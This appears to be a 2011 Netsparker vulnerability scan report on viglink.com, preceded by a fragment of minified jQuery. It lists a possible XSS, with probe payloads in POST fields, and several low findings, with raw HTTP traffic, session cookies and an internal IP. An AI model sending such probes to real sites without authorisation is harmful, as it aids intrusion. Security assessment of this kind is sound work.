g=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(g===o&&this.length)g=b.data(this[0],a);return g===o&&d[1]?this.data(d[0]):g}else return this.trigger("setData"+d[1]+"!",[d[0],c]).each(function(){b.data(this,a,c)})},removeData:function(a){return this.each(function(){b.removeData(this,a)})}});b.extend({queue:function(a,c,d){if(a){c=(c||"fx")+"queue";var g=b.data(a,c);if(!d)return g||[];if(!g||b.isArray(d))g=b.data(a,c,b.makeArray(d));else g.push(d);return g}},dequeue:function(a,c){c=c||"fx";var d=b.queue(a,c),g=d.shift();if(g==="inprogress")g=d.shift();if(g){c==="fx"&&d.unshift("inprogress");g.call(a,function(){b.dequeue(a,c)})}}});b.fn.extend({queue:function(a,c){if(typeof a!=="string"){c=a;a="fx"}if(c===o)return b.queue(this[0],a);return this.each(function(){var d=b.queue(this,a,c);a==="fx"&&d[0]!=="inprogress"&&b.dequeue(this,a)})},dequeue:function(a){return this.each(function(){b.dequeue(this,a)})},delay:function(a,c){a=b.fx?b.fx.speeds[a]||a:a;c=c||"fx";return this.queue(c,function(){var d=this;setTimeout(function(){b.dequeue(d,c)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var aa=/[\n\t]/g,da=/\s+/,ha=/\r/g,sa=/href|src|style/,za=/(button|input)/i,ya=/(button|input|object|select|textarea)/i,Fa=/^(a|area)$/i,v=/radio|checkbox/;b.fn.extend({attr:function(a,c){return h(this,a,c,true,b.attr)},removeAttr:function(a){return this.each(function(){b.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(b.isFunction(a))return this.each(function(E){var L=b(this);L.addClass(a.call(this,E,L.attr("class")))});if(a&&typeof a==="string")for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var m=" "+e.className+" ",n=e.className,C=0,x=c.length;C<x;C++)if(m.indexOf(" "+c[C]+" ")<0)n+=" "+c[C];e.className=b.trim(n)}else e.className=a}return this},removeClass:function(a){if(b.isFunction(a))return this.each(function(x){var E=b(this);E.removeClass(a.call(this,x,E.attr("class")))});if(a&&typeof a==="string"||a===o)for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var m=(" "+e.className+" ").replace(aa," "),n=0,C=c.length;n<C;n++)m=m.replace(" "+c[n]+" "," ");e.className=b.trim(m)}else e.className=""}return this},toggleClass:function(a,c){var d=typeof a,g=typeof c==="boolean";if(b.isFunction(a))return this.each(function(e){var m=b(this);m.toggleClass(a.call(this,e,m.attr("class"),c),c)});return this.each(function(){if(d==="string")for(var e,m=0,n=b(this),C=c,x=a.split(da);e=x[m++];){C=g?C:!n.hasClass(e);n[C?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&b.data(this,"__className__",this.className);this.className=this.className||a===false?"":b.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var c=0,d=this.length;c<d;c++)if((" "+this[c].className+" ").replace(aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===o){var c=this[0];if(c){if(b.nodeName(c,"option"))return(c.attributes.value||{}).specified?c.value:c.text;if(b.nodeName(c,"select")){var d=c.selectedIndex,g=[],e=c.options;c=c.type==="select-one";if(d<0)return null;var m=c?d:0;for(d=c?d+1:e.length;m<d;m++){var n=e[m];if(n.selected){a=b(n).val();if(c)return a;g.push(a)}}return g}if(v.test(c.type)&&!b.support.checkOn)return c.getAttribute("value")===null?"on":c.value;return(c.value||"").replace(ha,"")}}else{var C=b.isFunction(a);return this.each(function(x){var E=b(this),L=a;if(this.nodeType===1){if(C)L=a.call(this,x,E.val());if(typeof L==="number")L+="";if(b.isArray(L)&&v.test(this.type))this.checked=b.inArray(E.val(),L)>=0;else if(b.nodeName(this,"select")){var Y=b.makeArray(L);b("option",this).each(function(){this.selected=b.inArray(b(this).val(),Y)>=0});if(!Y.length)this.selectedIndex=-1}else this.value=L}})}}});b.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,c,d,g){if(!(!a||a.nodeType===3||a.nodeType===8)){if(g&&c in b.attrFn)return b(a)[c](d);g=a.nodeType!==1||!b.isXMLDoc(a);var e=d!==o;c=g&&b.props[c]||c;if(a.nodeType===1){var m=sa.test(c);if(c in a&&g&&!m){if(e){c==="type"&&za.test(a.nodeName)&&a.parentNode&&b.error("type property can't be changed");a[c]=d}if(b.nodeName(a,"form")&&a.getAttributeNode(c))return a.getAttributeNode(c).nodeValue;if(c==="tabIndex")return(c=a.getAttributeNode("tabIndex"))&&c.specified?c.value:ya.test(a.nodeName)||Fa.test(a.nodeName)&&a.href?0:o;return a[c]}if(!b.support.style&&g&&c==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(c,""+d);a=!b.support.hrefNormalized&&g&&m?a.getAttribute(c,2):a.getAttribute(c);return a===null?o:a}return b.style(a,c,d)}}});var H=/\.(.*)$/,X=function(a){return a.replace(/[^\w\s\.\|`]/g,function(c){return"\\"+c})};b.event={add:function(a,c,d,g){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==f&&..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

2 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /users/action/presales

/users/action/presales

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST '"><net sparker=alert(0x000491)>
domain POST 3
format POST json

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=568C01F6733C4EF745CF86FDB29B8CA8; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 74
Accept-Encoding: gzip, deflate

email='%22%3e%3cnet+sparker%3dnetsparker(0x000491)%3e&domain=3&format=json

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json
Date: Mon, 18 Apr 2011 23:52:30 GMT
Expires: -1
Pragma: no-cache
Content-Length: 101
Connection: keep-alive


{"message":"''\"><net sparker=netsparker(0x000491)>' is not a valid email address.","result":false}
- /users/action/presales

/users/action/presales

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST netsparker@example.com
domain POST '"><net sparker=alert(0x0004B9)>
format POST json

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=0D758EBC84516656A5552FB78210DFA3; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 97
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&domain='%22%3e%3cnet+sparker%3dnetsparker(0x0004B9)%3e&format=json

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json
Date: Mon, 18 Apr 2011 23:52:33 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: JSESSIONID=5DBF621D79B65D8D43E54ED603CF7320; Path=/
Content-Length: 87
Connection: keep-alive


{"message":"Invalid website ''\"><net sparker=netsparker(0x0004B9)>'","result":false}
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /users/login

/users/login CONFIRMED

https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F

Identified Field Name

password

Request

GET /users/login?_ek=tl&ar=%2Fusers%2F HTTP/1.1
Referer: https://www.viglink.com/users/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=380A9EABD02B302776B39533862B67EE; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2016
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>Please log in first.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value="/users/"/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? <a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /users/

/users/ CONFIRMED

https://www.viglink.com/users/

Identified Cookie

vglnk.Agent.p

Request

GET /users/ HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Location: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
Content-Length: 0
Connection: close
Content-Type: text/plain


Tomcat Version Disclosure

Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /users/action/login

/users/action/login

https://www.viglink.com/users/action/login

Extracted Version

Apache Tomcat/6.0.20

Request

GET /users/action/login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=70d5567f87d0029654b87f692c749fac; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 388
Connection: close


<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>Access to the specified resource () has been forbidden.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.20</h3></body></html>
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
- /

/

https://www.viglink.com/

Extracted IP Address(es)

10.242.201.220

Request

GET / HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/,JSESSIONID=A06F0DDC982BCE0244F28C001F36E03D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4912
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>Affiliate Every Link on the Web with VigLink</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? '.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-1203998437.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h-337151240.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2 class="tagline"> The easiest way to monetize your content <a href="/users/signup" class="default button">Get Started Today</a></h2><ol id="viglink_steps"> <li class="write"><div>Create links in your blog or webpages as normal.</div></li> <li class="track"><div>When visitors click a link, we follow along.</div></li> <li class="earn"><div>If a purchase is made, you earn a commission.</div></li></ol><div> <div class="column span-33p"> <a href="http://www.youtube-nocookie.com/watch?v=SIYBfHUY6cg&amp;hl=en_US&amp;fs=1&amp;rel=0" class="fancybox swf"> <img src="/public/images/screenshots/video-thumb.jpg" width="268" height="173" alt=""/> </a> <h4>How It Works</h4> <p> If one of your users clicks through to a product or service and buys something, you earn a commission. You only pay us a share of what you earn. </p> </div> <div class="column span-33p"> <a href="/public/images/screenshots/dashboard-revenue.jpg" class="image fancybox" title="" rel="dashboard"> <img src="/public/images/screenshots/dashboard-thumb.jpg" width="268" height="173" alt=""/> <span class="zoom">Zoom</span> </a> <a href="/public/images/screenshots/dashboard-merchants.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-links.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-clicks.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <h4>Powerful Analytics</h4> <p> Track where users are going when they leave your site, understand which links and pages are driving the most revenue and to which merchants, and much more. </p> </div> <div class="column span-33p"> <a href="/partners" id="partners" class="image"> <img src="/public/images/partners_lg/amazon.png" alt="Amazon logo" width="182" height="35"/> <img src="/public/images/partners_lg/itunes.png" alt="iTunes logo" width="138" height="35"/> <img src="/public/images/partners_lg/walmart.png" alt="Walmart logo" width="167" height="41"/> <img src="/public/images/partners_lg/target.png" alt="Target logo" width="47" height="59"/> <img src="/public/images/partners_lg/newegg.png" alt="Newegg logo" width="81" height="39"/> <span class="zoom">More Partners</span> </a> <h4>Over 12,500 Merchants</h4> <p> Enjoy coverage of thousands of merchants across more than 20 affiliate networks. Automatically participate in all of them with one simple signup. </p> </div></div><div> <div class="column span-33p"> <h4>Easy to Install</h4> <p> Install VigLink by pasting a few lines of HTML into your site. VigLink also works with common platforms like WordPress, Blogger, TypePad and more. </p> </div> <div class="column span-33p"> <h4>Reliable on Any Size Site</h4> <p> VigLink works for any site, whether it gets 5 visits or 5 billion. Our system is designed to be totally failsafe. Even if our servers blew up, your links will keep working perfectly. </p> </div> <div class="column span-33p"> <h4>Already an Affiliate?</h4> <p> VigLink only affiliates links you've missed, or links in programs you're not already using. Links you've already affiliated are left alone. VigLink won't cost you a thing. </p> </div> <div class="column span-100p" id="signup"> <a href="/users/signup" class="default button">Get Started Today</a> </div> <div class="column span-100p" id="quotes"> <ul class="quotes"> <li> <blockquote> VigLink has been a true partner in every aspect of the word. They continue to push the envelope to improve the consumer experience, while delivering high quality traffic to our site. I would recommend VigLink for any blog/forum that puts the consumer first. </blockquote> <p> <a href="http://motors.ebay.com"> <img src="/public/images/quotes/logo-ebaymotors.png" width="164" height"38" alt="Ebay Motors logo"/> <span class="who">Famous Rhodes</span> <span class="title">Director of eBay Motors</span> </a> </p></li><li> <blockquote> VigLink's technology is easy to install and instantly provides detailed reporting of revenue that you weren't making before. Beyond that, the technical team has been highly competent and responsive to needed changes - there's not a lot more we could ask for. We'll look forward to more products from this team in the future. </blockquote> <p> <a href="http://www.huddler.com"> <img src="/public/images/quotes/logo-huddler.png" width="162" height"49" alt="Huddler logo"/> <span class="who">Dan Gill</span> <span class="title">CEO Huddler.com</span> </a> </p></li><li> <blockquote> From the first day we started with VigLink, we have never looked back, or elsewhere, for real time commission link management. </blockquote> <p> <a href="http://www.avsforum.com"> <img src="/public/images/quotes/logo-avsforum.png" width="182" height"33" alt="AVS Forums logo"/> <span class="who">David Bott</span> <span class="title">AVSForum.com, Inc.</span> </a> </p></li><li> <blockquote> VigLink has been a great and responsive partner during our nearly 2 year partnership. Their innovative products and service have provided an additional channel of monetization without interfering with our core user experience. The additional value they bring to the table is a willingness to collaborate and assist us in developing new monetization opportunities. </blockquote> <p> <a href="http://www.internetbrands.com/"> <img src="/public/images/quotes/logo-internetbrands.png" width="109" height"49" alt="Internet Brands logo"/> <span class="who">Alvin Fong</span> <span class="title">Director, Internet Brands</span> </a> </p></li><li> <blockquote> VigLink has now become an essential part of our business strategy and a major revenue stream. A truly innovative way to monetize any web site quickly without the addition of traditional intrusive display ads. </blockquote> <p> <a href="http://www.forumfoundry.com/"> <img src="/public/images/quotes/logo-forumfoundry.png" width="80" height"55" alt="Forum Foundry logo"/> <span class="who">Dan Kiehl</span> <span class="title">Forumfoundry.com</span> </a> </p></li><li> <blockquote> VigLink is a fast, automated way for Bloggers to partner with Google Affiliate Network. It takes minimal effort for Bloggers to monetize their content through Google Affiliate Network links and we've already seen VigLink installs result in new productive, affiliate publishers. </blockquote> <p> <a href="http://www.connectcommerce.com/"> <span class="who">Mari Condon</span> <span class="title">Publisher Account Manager,</span> <span class="title">Google Affiliate Network</span> </a> </p></li><li> <blockquote> I was skeptical at first how much VigLink could do for me. After almost a year of putting it off I decided to give it a try. Now I'm very sorry I lost a year of significant revenue. Installation takes a minute, nice Control Panel, no noticeable difference for your users, and best of all great money paid on time! </blockquote> <p> <a href="http://www.ferrarichat.com/"> <img src="/public/images/quotes/logo-ferrarichat.png" width="147" height"38" alt="Ferrari Chat logo"/> <span class="who">Rob Lay</span> <span class="title">Owner, Ferrarichat.com</span> </a> </p></li><li> <blockquote> VigLink is a long-standing strategic partner with eBay, eBay Motors, and eBay Marketing. We consider VigLink to be one of the most relevant and efficient sub-affiliate partners we have in our program today. Their work to build unique incremental tools with eBay APIs and to standardize implementations across many different kinds of platforms sets them apart as an innovative industry leader in the internet marketing space. </blockquote> <p> <a href="http://www.schaafco.com/"> <img src="/public/images/quotes/logo-schaaf.png" width="107" height"47" alt="Schaaf Partnercentric logo"/> <span class="title">Schaaf-PartnerCentric/eBay</span> </a> </p></li><li> <blockquote> I was skeptical about the VigLink program when it was presented. I checked with two more technical advisers who said it looked OK. I signed up, put in the code in my Forum software and was shocked to see the income the first month. I've been receiving three and sometimes four figures of income each month. It's a great deal. </blockquote> <p> <a href="http://www.askandyaboutclothes.com/"> <span class="who">Andy Gilchrist</span> <span class="title">Owner, AskAndyAboutClothes.com</span> </a> </p></li><li> <blockquote> I have been with VigLink one week and so far, I love it! I don't have time to affiliate all my links when I don't know which blog posts will generate traffic and which ones don't. VigLink gives me the option to focus on good content, and traffic building, not link building. </blockquote> <p> <a href="http://www.morewithlesstoday.com/"> <span class="who">Lori Felix</span> <span class="title">Blogger, More With Less Today</span> </a> </p></li></ul> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 